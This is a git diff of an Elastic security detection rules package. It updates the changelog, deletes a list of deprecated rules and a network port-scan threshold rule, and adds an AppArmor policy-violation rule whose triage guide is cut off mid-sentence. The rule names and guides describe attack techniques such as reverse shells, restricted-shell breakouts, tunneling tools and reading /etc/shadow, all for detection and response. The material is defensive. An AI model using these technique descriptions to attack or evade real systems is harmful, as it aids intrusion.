diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml
index ca89e8a83db..11bb134cd6c 100644
--- a/packages/security_detection_engine/changelog.yml
+++ b/packages/security_detection_engine/changelog.yml
@@ -1,5 +1,10 @@
 # newer versions go on top
 # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production
+- version: 8.19.18-beta.1
+ changes:
+ - description: Release security rules update
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/17984
 - version: 8.19.17
 changes:
 - description: Release security rules update
diff --git a/packages/security_detection_engine/deprecated_rules.json b/packages/security_detection_engine/deprecated_rules.json
deleted file mode 100644
index 99fc1fc9451..00000000000
--- a/packages/security_detection_engine/deprecated_rules.json
+++ /dev/null
@@ -1,557 +0,0 @@ -{ - "015cca13-8832-49ac-a01b-a396114809f6": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS Redshift Cluster Creation", - "stack_version": "8.19" - }, - "03a514d9-500e-443e-b6a9-72718c548f6c": { - "deprecation_date": "2025/03/14", - "rule_name": "Deprecated - SSH Process Launched From Inside A Container", - "stack_version": "8.14" - }, - "041d4d41-9589-43e2-ba13-5680af75ebc2": { - "deprecation_date": "2023/09/25", - "rule_name": "Deprecated - Potential DNS Tunneling via Iodine", - "stack_version": "8.3" - }, - "08d5d7e2-740f-44d8-aeda-e41f4263efaf": { - "deprecation_date": "2021/04/15", - "rule_name": "TCP Port 8000 Activity to the Internet", - "stack_version": "7.14.0" - }, - "09443c92-46b3-45a4-8f25-383b028b258d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Process Termination followed by Deletion", - "stack_version": "8.19" - }, - "0968cfbd-40f0-4b1c-b7b1-a60736c7b241": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via cpulimit Shell Evasion", - "stack_version": "7.16" - }, - "0c9a14d9-d65d-486f-9b5b-91e4e6b22bd0": { - "deprecation_date": "2023/07/03", - "rule_name": "Deprecated - Threat Intel Indicator Match", - "stack_version": "8.5" - }, - "0f616aee-8161-4120-857e-742366f5eeb3": { - "deprecation_date": "2021/04/15", - "rule_name": "PowerShell spawning Cmd", - "stack_version": "7.14.0" - }, - "10754992-28c7-4472-be5b-f3770fd04f2d": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via awk Commands", - "stack_version": "7.16" - }, - "119c8877-8613-416d-a98a-96b6664ee73a5": { - "deprecation_date": "2021/08/02", - "rule_name": "AWS RDS Snapshot Export", - "stack_version": "7.13" - }, - "120559c6-5e24-49f4-9e30-8ffe697df6b9": { - "deprecation_date": "2021/04/15", - "rule_name": "User Discovery via Whoami", - "stack_version": "7.14.0" - }, - "125417b8-d3df-479f-8418-12d7e034fee3": { - "deprecation_date": "2022/07/25", - 
"rule_name": "Attempt to Disable IPTables or Firewall", - "stack_version": "7.16" - }, - "139c7458-566a-410c-a5cd-f80238d6a5cd": { - "deprecation_date": "2021/04/15", - "rule_name": "SQL Traffic to the Internet", - "stack_version": "7.14.0" - }, - "1859ce38-6a50-422b-a5e8-636e231ea0cd": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via c89/c99 Shell evasion", - "stack_version": "7.16" - }, - "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS ElastiCache Security Group Modified or Deleted", - "stack_version": "8.19" - }, - "1c84dd64-7e6c-4bad-ac73-a5014ee37042": { - "deprecation_date": "2025/06/26", - "rule_name": "Deprecated - Suspicious File Creation in /etc for Persistence", - "stack_version": "8.18" - }, - "1defdd62-cd8d-426e-a246-81a37751bb2b": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Execution of File Written or Modified by PDF Reader", - "stack_version": "8.19" - }, - "20dc4620-3b68-4269-8124-ca5091e00ea8": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Max Login Sessions", - "stack_version": "7.16" - }, - "231876e7-4d1f-4d63-a47c-47dd1acdc1cb": { - "deprecation_date": "2023/03/04", - "rule_name": "Potential Shell via Web Server", - "stack_version": "8.3" - }, - "2377946d-0f01-4957-8812-6878985f515d": { - "deprecation_date": "2024/04/01", - "rule_name": "Deprecated - Remote File Creation on a Sensitive Directory", - "stack_version": "8.9" - }, - "28738f9f-7427-4d23-bc69-756708b5f624": { - "deprecation_date": "2024/07/18", - "rule_name": "Suspicious File Changes Activity Detected", - "stack_version": "8.10" - }, - "28896382-7d4f-4d50-9b72-67091901fd26": { - "deprecation_date": "2022/08/03", - "rule_name": "Suspicious Process from Conhost", - "stack_version": "7.16" - }, - "2f0bae2d-bf20-4465-be86-1311addebaa3": { - "deprecation_date": "2022/10/04", - "rule_name": "GCP Kubernetes Rolebindings Created or Patched", - 
"stack_version": "8.3" - }, - "301571f3-b316-4969-8dd0-7917410030d3": { - "deprecation_date": "2023/12/14", - "rule_name": "Malicious Remote File Creation", - "stack_version": "8.9" - }, - "30e1e9f2-eb9c-439f-aff6-1e3068e99384": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Network Connection via Sudo Binary", - "stack_version": "8.19" - }, - "3115bd2c-0baa-4df0-80ea-45e474b5ef93": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Agent Spoofing - Mismatched Agent ID", - "stack_version": "8.19" - }, - "3605a013-6f0c-4f7d-88a5-326f5be262ec": { - "deprecation_date": "2022/08/01", - "rule_name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", - "stack_version": "7.16" - }, - "378f9024-8a0c-46a5-aa08-ce147ac73a4e": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Security Group Creation", - "stack_version": "8.19" - }, - "3a86e085-094c-412d-97ff-2439731e59cb": { - "deprecation_date": "2021/03/03", - "rule_name": "Setgid Bit Set via chmod", - "stack_version": "7.13" - }, - "3efee4f0-182a-40a8-a835-102c68a4175d": { - "deprecation_date": "2025/01/17", - "rule_name": "Deprecated - Potential Password Spraying of Microsoft 365 User Accounts", - "stack_version": "8.12" - }, - "43303fd4-4839-4e48-b2b2-803ab060758d": { - "deprecation_date": "2022/09/13", - "rule_name": "Web Application Suspicious Activity: No User Agent", - "stack_version": "8.5" - }, - "47f09343-8d1f-4bb5-8bb0-00c9d18f5010": { - "deprecation_date": "2021/03/17", - "rule_name": "Execution via Regsvcs/Regasm", - "stack_version": "7.14.0" - }, - "4973e46b-a663-41b8-a875-ced16dda2bb0": { - "deprecation_date": "2023/09/25", - "rule_name": "Deprecated - Potential Process Injection via LD_PRELOAD Environment Variable", - "stack_version": "8.6" - }, - "4aa58ac6-4dc0-4d18-b713-f58bf8bd015c": { - "deprecation_date": "2025/03/04", - "rule_name": "Potential Cross Site Scripting (XSS)", - "stack_version": "8.12" - }, - 
"4b1a807a-4e7b-414e-8cea-24bf580f6fc5": { - "deprecation_date": "2023/11/02", - "rule_name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process", - "stack_version": "8.3" - }, - "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Successful Linux RDP Brute Force Attack Detected", - "stack_version": "8.19" - }, - "573f6e7a-7acf-4bcd-ad42-c4969124d3c0": { - "deprecation_date": "2025/07/09", - "rule_name": "Deprecated - Azure Virtual Network Device Modified or Deleted", - "stack_version": "8.18" - }, - "5c50ffa6-07f4-4cce-a1b7-c16928a2ed52": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - SSH Process Launched From Inside A Container via Elastic Defend", - "stack_version": "8.19" - }, - "5e87f165-45c2-4b80-bfa5-52822552c997": { - "deprecation_date": "2022/03/16", - "rule_name": "Potential PrintNightmare File Modification", - "stack_version": "7.13" - }, - "61c31c14-507f-4627-8c31-072556b89a9c": { - "deprecation_date": "2021/04/15", - "rule_name": "Mknod Process Activity", - "stack_version": "7.14.0" - }, - "62b68eb2-1e47-4da7-85b6-8f478db5b272": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Non-Standard Port HTTP/HTTPS connection", - "stack_version": "8.19" - }, - "6506c9fd-229e-4722-8f0f-69be759afd2a": { - "deprecation_date": "2022/03/16", - "rule_name": "Potential PrintNightmare Exploit Registry Modification", - "stack_version": "7.13" - }, - "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Successful Linux FTP Brute Force Attack Detected", - "stack_version": "8.19" - }, - "67a9beba-830d-4035-bfe8-40b7e28f8ac4": { - "deprecation_date": "2021/04/15", - "rule_name": "SMTP to the Internet", - "stack_version": "7.14.0" - }, - "68113fdc-3105-4cdd-85bb-e643c416ef0b": { - "deprecation_date": "2021/04/15", - "rule_name": "Query Registry via reg.exe", - "stack_version": "7.14.0" 
- }, - "699e9fdb-b77c-4c01-995c-1c15019b9c43": { - "deprecation_date": "2023/07/03", - "rule_name": "Deprecated - Threat Intel Filebeat Module (v8.x) Indicator Match", - "stack_version": "8.5" - }, - "6ea71ff0-9e95-475b-9506-2580d1ce6154": { - "deprecation_date": "2022/08/02", - "rule_name": "DNS Activity to the Internet", - "stack_version": "7.16" - }, - "6f1500bc-62d7-4eb9-8601-7485e87da2f4": { - "deprecation_date": "2021/04/15", - "rule_name": "SSH (Secure Shell) to the Internet", - "stack_version": "7.14.0" - }, - "6f683345-bb10-47a7-86a7-71e9c24fb358": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the find command", - "stack_version": "7.16" - }, - "72d33577-f155-457d-aad3-379f9b750c97": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via env Shell Evasion", - "stack_version": "7.16" - }, - "7a137d76-ce3d-48e2-947d-2747796a78c0": { - "deprecation_date": "2021/04/15", - "rule_name": "Network Sniffing via Tcpdump", - "stack_version": "7.14.0" - }, - "7b08314d-47a0-4b71-ae4e-16544176924f": { - "deprecation_date": "2022/08/02", - "rule_name": "File and Directory Discovery", - "stack_version": "7.16" - }, - "7b3da11a-60a2-412e-8aa7-011e1eb9ed47": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS ElastiCache Security Group Created", - "stack_version": "8.19" - }, - "7d2c38d7-ede7-4bdf-b140-445906e6c540": { - "deprecation_date": "2021/04/15", - "rule_name": "Tor Activity to the Internet", - "stack_version": "7.14.0" - }, - "81cc58f5-8062-49a2-ba84-5cc4b4d31c40": { - "deprecation_date": "2021/04/15", - "rule_name": "Persistence via Kernel Module Modification", - "stack_version": "7.14.0" - }, - "83b2c6e5-e0b2-42d7-8542-8f3af86a1acb": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the mysql command", - "stack_version": "7.16" - }, - "863cdf31-7fd3-41cf-a185-681237ea277b": { - "deprecation_date": "2026/01/16", - "rule_name": 
"Deprecated - AWS RDS Security Group Deletion", - "stack_version": "8.19" - }, - "86c3157c-a951-4a4f-989b-2f0d0f1f9518": { - "deprecation_date": "2024/02/22", - "rule_name": "Potential Linux Reverse Connection through Port Knocking", - "stack_version": "8.3" - }, - "87ec6396-9ac4-4706-bcf0-2ebb22002f43": { - "deprecation_date": "2021/04/15", - "rule_name": "FTP (File Transfer Protocol) Activity to the Internet", - "stack_version": "7.14.0" - }, - "89583d1b-3c2e-4606-8b74-0a9fd2248e88": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the vi command", - "stack_version": "7.16" - }, - "8acb7614-1d92-4359-bfcf-478b6d9de150": { - "deprecation_date": "2025/01/17", - "rule_name": "Deprecated - Suspicious JAVA Child Process", - "stack_version": "8.12" - }, - "8fed8450-847e-43bd-874c-3bbf0cd425f3": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via apt/apt-get Changelog Escape", - "stack_version": "7.16" - }, - "90e28af7-1d96-4582-bf11-9a1eff21d0e5": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Login Attempt at Forbidden Time", - "stack_version": "7.16" - }, - "93f47b6f-5728-4004-ba00-625083b3dcb0": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Modification of Standard Authentication Module or Configuration", - "stack_version": "8.19" - }, - "947827c6-9ed6-4dec-903e-c856c86e72f3": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Creation of Kernel Module", - "stack_version": "8.19" - }, - "97da359b-2b61-4a40-b2e4-8fc48cf7a294": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the SSH command", - "stack_version": "7.16" - }, - "97f22dab-84e8-409d-955e-dacd1d31670b": { - "deprecation_date": "2021/04/15", - "rule_name": "Base64 Encoding/Decoding Activity", - "stack_version": "7.14.0" - }, - "98fd7407-0bd5-5817-cda0-3fcc33113a56": { - "deprecation_date": "2025/07/16", - "rule_name": "Deprecated - AWS EC2 
Snapshot Activity", - "stack_version": "8.18" - }, - "9cf7a0ae-2404-11ed-ae7d-f661ea17fbce": { - "deprecation_date": "2023/02/16", - "rule_name": "Google Workspace User Group Access Modified to Allow External Access", - "stack_version": "8.4" - }, - "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae1": { - "deprecation_date": "2021/04/15", - "rule_name": "Trusted Developer Application Usage", - "stack_version": "7.14.0" - }, - "9d19ece6-c20e-481a-90c5-ccca596537de": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - LaunchDaemon Creation or Modification and Immediate Loading", - "stack_version": "8.19" - }, - "a4ec1382-4557-452b-89ba-e413b22ed4b8": { - "deprecation_date": "2020/10/30", - "rule_name": "Network Connection via Mshta", - "stack_version": "7.10.0" - }, - "a577e524-c2ee-47bd-9c5b-e917d01d3276": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - CAP_SYS_ADMIN Assigned to Binary", - "stack_version": "8.19" - }, - "a5f0d057-d540-44f5-924d-c6a2ae92f045": { - "deprecation_date": "2023/06/22", - "rule_name": "Potential SSH Brute Force Detected on Privileged Account", - "stack_version": "8.3" - }, - "a9198571-b135-4a76-b055-e3e5a476fd83": { - "deprecation_date": "2021/04/15", - "rule_name": "Hex Encoding/Decoding Activity", - "stack_version": "7.14.0" - }, - "ac8805f6-1e08-406c-962e-3937057fa86f": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Protocol Tunneling via Chisel Server", - "stack_version": "8.19" - }, - "ad0e5e75-dd89-4875-8d0a-dfdc1828b5f3": { - "deprecation_date": "2021/04/15", - "rule_name": "Proxy Port Activity to the Internet", - "stack_version": "7.14.0" - }, - "b1c14366-f4f8-49a0-bcbb-51d2de8b0bb8": { - "deprecation_date": "2021/04/15", - "rule_name": "Potential Persistence via Cron Job", - "stack_version": "7.14.0" - }, - "bc0c6f0d-dab0-47a3-b135-0925f0a333bc": { - "deprecation_date": "2025/11/21", - "rule_name": "Deprecated - AWS Root Login Without MFA", - "stack_version": "8.19" - }, - 
"bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Non-Standard Port SSH connection", - "stack_version": "8.19" - }, - "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Pspy Process Monitoring Detected", - "stack_version": "8.19" - }, - "c125e48f-6783-41f0-b100-c3bf1b114d16": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Suspicious Renaming of ESXI index.html File", - "stack_version": "8.19" - }, - "c6474c34-4953-447a-903e-9fcb7b6661aa": { - "deprecation_date": "2021/04/15", - "rule_name": "IRC (Internet Relay Chat) Protocol Activity to the Internet", - "stack_version": "7.14.0" - }, - "c6655282-6c79-11ef-bbb5-f661ea17fbcc": { - "deprecation_date": "2025/07/16", - "rule_name": "Deprecated - Azure Entra Sign-in Brute Force Microsoft 365 Accounts by Repeat Source", - "stack_version": "8.18" - }, - "c87fca17-b3a9-4e83-b545-f30746c53920": { - "deprecation_date": "2021/04/15", - "rule_name": "Nmap Process Activity", - "stack_version": "7.14.0" - }, - "cab4f01c-793f-4a54-a03e-e5d85b96d7af": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Login from Forbidden Location", - "stack_version": "7.16" - }, - "cc16f774-59f9-462d-8b98-d27ccd4519ec": { - "deprecation_date": "2021/04/15", - "rule_name": "Process Discovery via Tasklist", - "stack_version": "7.14.0" - }, - "ccc55af4-9882-4c67-87b4-449a7ae8079c": { - "deprecation_date": "2023/12/15", - "rule_name": "Potential Process Herpaderping Attempt", - "stack_version": "8.3" - }, - "cd4d5754-07e1-41d4-b9a5-ef4ea6a0a126": { - "deprecation_date": "2021/04/15", - "rule_name": "Socat Process Activity", - "stack_version": "7.14.0" - }, - "d2053495-8fe7-4168-b3df-dad844046be3": { - "deprecation_date": "2021/04/15", - "rule_name": "PPTP (Point to Point Tunneling Protocol) Activity", - "stack_version": "7.14.0" - }, - "d55436a8-719c-445f-92c4-c113ff2f9ba5": { - 
"deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Privilege Escalation via UID INT_MAX Bug Detected", - "stack_version": "8.19" - }, - "d6450d4e-81c6-46a3-bd94-079886318ed5": { - "deprecation_date": "2022/07/28", - "rule_name": "Strace Process Activity", - "stack_version": "7.16" - }, - "da986d2c-ffbf-4fd6-af96-a88dbf68f386": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the gcc command", - "stack_version": "7.16" - }, - "dc672cb7-d5df-4d1f-a6d7-0841b1caafb9": { - "deprecation_date": "2022/01/12", - "rule_name": "Threat Intel Filebeat Module (v7.x) Indicator Match", - "stack_version": "8.0" - }, - "dd7f1524-643e-11ed-9e35-f661ea17fbcd": { - "deprecation_date": "2023/07/04", - "rule_name": "Reverse Shell Created via Named Pipe", - "stack_version": "8.3" - }, - "df959768-b0c9-4d45-988c-5606a2be8e5a": { - "deprecation_date": "2022/07/25", - "rule_name": "Unusual Process Execution - Temp", - "stack_version": "7.16" - }, - "e0dacebe-4311-4d50-9387-b17e89c2e7fd": { - "deprecation_date": "2022/08/02", - "rule_name": "Whitespace Padding in Process Command Line", - "stack_version": "7.16" - }, - "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Cluster Creation", - "stack_version": "8.19" - }, - "e56993d2-759c-4120-984c-9ec9bb940fd5": { - "deprecation_date": "2021/04/15", - "rule_name": "RDP (Remote Desktop Protocol) to the Internet", - "stack_version": "7.14.0" - }, - "e919611d-6b6f-493b-8314-7ed6ac2e413b": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS EC2 VM Export Failure", - "stack_version": "8.19" - }, - "e9b4a3c7-24fc-49fd-a00f-9c938031eef1": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via busybox Shell Evasion", - "stack_version": "7.16" - }, - "ea0784f0-a4d7-4fea-ae86-4baaf27a6f17": { - "deprecation_date": "2021/04/15", - "rule_name": "SSH (Secure Shell) from the 
Internet", - "stack_version": "7.14.0" - }, - "eb6a3790-d52d-11ec-8ce9-f661ea17fbce": { - "deprecation_date": "2023/07/31", - "rule_name": "Suspicious Network Connection Attempt by Root", - "stack_version": "8.3" - }, - "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Instance/Cluster Stoppage", - "stack_version": "8.19" - }, - "ee619805-54d7-4c56-ba6f-7717282ddd73": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via crash Shell evasion", - "stack_version": "7.16" - }, - "f30f3443-4fbb-4c27-ab89-c3ad49d62315": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Instance Creation", - "stack_version": "8.19" - }, - "f41296b4-9975-44d6-9486-514c6f635b2d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential curl CVE-2023-38545 Exploitation", - "stack_version": "8.19" - }, - "f52362cd-baf1-4b6d-84be-064efc826461": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via flock Shell evasion", - "stack_version": "7.16" - }, - "f5488ac1-099e-4008-a6cb-fb638a0f0828": { - "deprecation_date": "2025/03/14", - "rule_name": "Deprecated - SSH Connection Established Inside A Running Container", - "stack_version": "8.14" - }, - "fb9937ce-7e21-46bf-831d-1ad96eac674d": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Max Failed Login Attempts", - "stack_version": "7.16" - }, - "fd3fc25e-7c7c-4613-8209-97942ac609f6": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the expect command", - "stack_version": "7.16" - } -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json deleted file mode 100644 index e35ec0c0445..00000000000 
--- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json
+++ /dev/null
@@ -1,116 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule defines a threshold-based approach to detect connection attempts from a single source to a wide range of destination ports.", - "from": "now-9m", - "index": [ - "logs-network_traffic.*", - "packetbeat-*", - "filebeat-*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential Network Scan Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Network Scan Detected\n\nNetwork scanning is a technique used to identify open ports and services on a network, often exploited by attackers to find vulnerabilities. Adversaries may use this method to map out a network's structure and identify weak points for further exploitation. The detection rule identifies suspicious activity by monitoring for multiple connection attempts from a single source to numerous destination ports, indicating a potential scan. 
This helps in early detection and mitigation of reconnaissance activities.\n\n### Possible investigation steps\n\n- Review the source IP address involved in the alert to determine if it belongs to a known or trusted entity within the organization. Check if the IP falls within the specified ranges: 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16.\n- Analyze the network flow logs to identify the specific destination ports that were targeted by the source IP. Determine if these ports are associated with critical services or known vulnerabilities.\n- Correlate the detected activity with any recent changes or updates in the network infrastructure that might explain the scanning behavior, such as new devices or services being deployed.\n- Investigate if there are any other alerts or logs indicating similar scanning activities from the same source IP or other IPs within the same subnet, which might suggest a coordinated scanning effort.\n- Check for any historical data or past incidents involving the source IP to assess if this behavior is part of a recurring pattern or a new anomaly.\n- Consult with network administrators to verify if the detected activity aligns with any scheduled network assessments or security tests that might have been conducted without prior notification.\n\n### False positive analysis\n\n- Internal network scanning tools used for legitimate security assessments can trigger this rule. To manage this, create exceptions for known IP addresses of authorized scanning tools.\n- Automated network monitoring systems that check service availability across multiple ports may be flagged. Exclude these systems by identifying their IP addresses and adding them to an exception list.\n- Load balancers and network devices that perform health checks on various services might cause false positives. 
Identify these devices and configure the rule to ignore their IP addresses.\n- Development and testing environments where frequent port scanning is part of routine operations can be mistakenly flagged. Implement exceptions for these environments by specifying their IP ranges.\n- Regularly scheduled vulnerability assessments conducted by internal security teams can appear as network scans. Document these activities and exclude the associated IPs from triggering the rule.\n\n### Response and remediation\n\n- Isolate the affected host: Immediately disconnect the source IP from the network to prevent further scanning or potential exploitation of identified vulnerabilities.\n- Conduct a thorough investigation: Analyze the source IP's activity logs to determine if any unauthorized access or data exfiltration has occurred. This will help assess the extent of the threat.\n- Update firewall rules: Implement stricter access controls to limit the number of open ports and restrict unnecessary inbound and outbound traffic from the affected IP range.\n- Patch and update systems: Ensure all systems and services identified during the scan are up-to-date with the latest security patches to mitigate known vulnerabilities.\n- Monitor for recurrence: Set up enhanced monitoring for the source IP and similar scanning patterns to quickly detect and respond to any future scanning attempts.\n- Escalate to security operations: If the scan is part of a larger attack or if sensitive data is at risk, escalate the incident to the security operations team for further analysis and response.\n- Review and enhance detection capabilities: Evaluate the effectiveness of current detection mechanisms and consider integrating additional threat intelligence sources to improve early detection of similar threats.", - "query": "event.action:network_flow and destination.port:* and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - "related_integrations": [ - { - "package": "network_traffic", - 
"version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "0171f283-ade7-4f87-9521-ac346c68cc9b", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.port", - "value": 250 - } - ], - "field": [ - "destination.ip", - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 12 - }, - "id": "0171f283-ade7-4f87-9521-ac346c68cc9b_12", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json b/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json new file mode 100644 index 00000000000..87ed39182b8 
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Policy Violation Detected", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Policy Violation Detected\n\nThis alert shows that AppArmor blocked or limited a Linux process because it tried to act outside its assigned security profile, which can reveal privilege escalation, restricted file access, or defense-evasion activity being stopped by the kernel. 
An attacker who gains code execution in a web-facing service might try to read `/etc/shadow`, spawn a shell from the confined process, or touch protected sockets, causing this violation when AppArmor contains the behavior.\n\n### Possible investigation steps\n\n- Determine which AppArmor profile produced the denial and what resource or capability was blocked, then judge whether the attempted action matches the application's expected behavior or suggests shell execution, credential access, or unusual network activity.\n- Build a short timeline around the event for the affected workload to identify preceding parent-child process chains, interactive sessions, failed access attempts, new persistence artifacts, or outbound connections that indicate exploitation rather than misconfiguration.\n- Review recent software deployments, package updates, profile changes, and administrator actions on the host to verify whether the violation began after a legitimate change that may require profile tuning or rollback.\n- If the denied behavior is unexpected or repeated, validate the integrity and reputation of the involved binary or script against known-good versions from the environment and inspect its execution context for signs of tampering or abuse.\n- For violations that align with malicious behavior, preserve relevant audit and system logs, contain the host or impacted service as needed, remove any confirmed malicious artifacts, and retain or harden the AppArmor policy that successfully blocked the action.\n\n### False positive analysis\n\n- A legitimate application or package update may change binaries, file paths, or socket usage without a matching AppArmor profile update, so verify the alert timing against recent host software changes and confirm the denied path or capability is part of the application's documented normal operation.\n- An administrator-initiated maintenance task or service restart can trigger a confined process to access temporary files, logs, or helper 
executables outside its usual profile, so review the parent process, command line, and user context to confirm it aligns with expected maintenance activity on the host.\n\n### Response and remediation\n\n- Isolate the affected Linux host or container from the network, stop the compromised service or process that triggered the AppArmor denial, and disable any abused user or service account to prevent additional attacker execution.\n- Remove attacker footholds by deleting unauthorized systemd units, cron jobs, startup scripts, SSH `authorized_keys` additions, dropped web shells, or replaced binaries linked to the confined process, then terminate any related child shells or reverse-connection tools.\n- Restore the workload to a known-good state by rebuilding the host or redeploying the service from a trusted image, reinstalling affected packages, validating critical files such as `/etc/passwd`, `/etc/shadow`, and application binaries against baseline hashes, and rotating any credentials the process may have reached.\n- Escalate to incident response immediately if the denial came from an internet-facing service, involved attempts to spawn a shell or read protected files, showed tampering with 